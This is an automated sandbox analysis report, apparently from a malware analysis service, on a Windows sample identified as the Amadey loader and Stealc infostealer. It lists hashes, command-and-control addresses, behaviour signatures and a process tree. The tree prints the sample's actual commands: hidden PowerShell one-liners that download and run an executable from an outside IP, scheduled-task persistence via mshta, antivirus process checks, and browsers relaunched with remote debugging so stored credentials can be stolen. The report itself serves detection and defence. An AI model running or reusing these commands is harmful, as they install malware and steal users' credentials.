Resubmissions

26/03/2025, 09:19

250326-lal5mawmt7 10

26/03/2025, 09:11

250326-k54gqa1sex 10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 09:11

General

  • Target

    7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe

  • Size

    1.8MB

  • MD5

    e13b8e511787a1d1fba4df4bef37ed4f

  • SHA1

    4b49c4dbbdd29a5d982fc54fbe1dc8267bd0e81d

  • SHA256

    7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3

  • SHA512

    7b76b73777db5c8bb990b2d0a533c81ae41457c5e96ae34ab652225ce45297ce15b243665742afe0f041b2c4caf2f3b63b67271298442c7a4537256f1e54d86c

  • SSDEEP

    24576:QAyHpGFysY88QNM7a9oBNcptVNL/fEy9mT6FsCM+EaIte2QZJ1j8E:QZH8E388sM7aiWptVNwlgjI30g

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 22 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 28 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 32 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2464
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5548
    • C:\Users\Admin\AppData\Local\Temp\7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe
      "C:\Users\Admin\AppData\Local\Temp\7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:5108
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4664
        • C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
          "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\SysWOW64\CMD.exe
            "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:6072
            • C:\Windows\SysWOW64\findstr.exe
              findstr /I "opssvc wrsa"
              5⤵
                PID:3416
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                5⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:3308
              • C:\Windows\SysWOW64\findstr.exe
                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1704
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 267978
                5⤵
                  PID:2360
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Spanish.vss
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3600
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "East" Removed
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:5076
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2732
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2676
                • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                  Exam.com j
                  5⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:3064
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 900
                    6⤵
                    • Program crash
                    PID:4168
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4604
            • C:\Users\Admin\AppData\Local\Temp\10339220101\007f09163e.exe
              "C:\Users\Admin\AppData\Local\Temp\10339220101\007f09163e.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:6024
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn l0izpmakyp9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\yxZDe4vej.hta" /sc minute /mo 25 /ru "Admin" /f
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4064
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn l0izpmakyp9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\yxZDe4vej.hta" /sc minute /mo 25 /ru "Admin" /f
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:4172
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\yxZDe4vej.hta
                4⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1424
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XFQULAW3FPOBS2CYZSSOPCOIY3Q8VQVF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  5⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:740
                  • C:\Users\Admin\AppData\Local\TempXFQULAW3FPOBS2CYZSSOPCOIY3Q8VQVF.EXE
                    "C:\Users\Admin\AppData\Local\TempXFQULAW3FPOBS2CYZSSOPCOIY3Q8VQVF.EXE"
                    6⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4796
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10339230121\am_no.cmd" "
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5116
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                4⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:4588
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5180
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6024
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3968
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1436
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:3148
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4988
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "3cYLMmaURWj" /tr "mshta \"C:\Temp\RTaQ49xFd.hta\"" /sc minute /mo 25 /ru "Admin" /f
                4⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3704
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\RTaQ49xFd.hta"
                4⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:1888
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  5⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4944
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    6⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3720
            • C:\Users\Admin\AppData\Local\Temp\10339380101\1c194d3bd0.exe
              "C:\Users\Admin\AppData\Local\Temp\10339380101\1c194d3bd0.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2456
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4344
            • C:\Users\Admin\AppData\Local\Temp\10339390101\73d82db32a.exe
              "C:\Users\Admin\AppData\Local\Temp\10339390101\73d82db32a.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:5264
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4256
            • C:\Users\Admin\AppData\Local\Temp\10339400101\2afb49c59b.exe
              "C:\Users\Admin\AppData\Local\Temp\10339400101\2afb49c59b.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5584
            • C:\Users\Admin\AppData\Local\Temp\10339410101\1f0787cd03.exe
              "C:\Users\Admin\AppData\Local\Temp\10339410101\1f0787cd03.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:5784
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                4⤵
                • Uses browser remote debugging
                • Checks processor information in registry
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1468
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffded8edcf8,0x7ffded8edd04,0x7ffded8edd10
                  5⤵
                    PID:5604
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2100 /prefetch:3
                    5⤵
                      PID:5388
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2072,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2068 /prefetch:2
                      5⤵
                        PID:5600
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2388,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2488 /prefetch:8
                        5⤵
                          PID:5084
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3220 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:3488
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3240 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:5324
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4248,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4308 /prefetch:2
                          5⤵
                          • Uses browser remote debugging
                          PID:2452
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4684 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:2912
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4932,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5348 /prefetch:8
                          5⤵
                            PID:5072
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5248,i,7483616440396687777,14981297748273061502,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5384 /prefetch:8
                            5⤵
                              PID:4248
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                            4⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            PID:2380
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x24c,0x7ffdea43f208,0x7ffdea43f214,0x7ffdea43f220
                              5⤵
                                PID:5208
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,11702362595604713967,14600762495613933078,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:2
                                5⤵
                                  PID:2916
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1924,i,11702362595604713967,14600762495613933078,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
                                  5⤵
                                    PID:4308
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2568,i,11702362595604713967,14600762495613933078,262144 --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:8
                                    5⤵
                                      PID:5728
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,11702362595604713967,14600762495613933078,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:388
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,11702362595604713967,14600762495613933078,262144 --variations-seed-version --mojo-platform-channel-handle=3544 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:3656
                                • C:\Users\Admin\AppData\Local\Temp\10339420101\13caf461b8.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10339420101\13caf461b8.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:4296
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM firefox.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5220
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM chrome.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3136
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM msedge.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
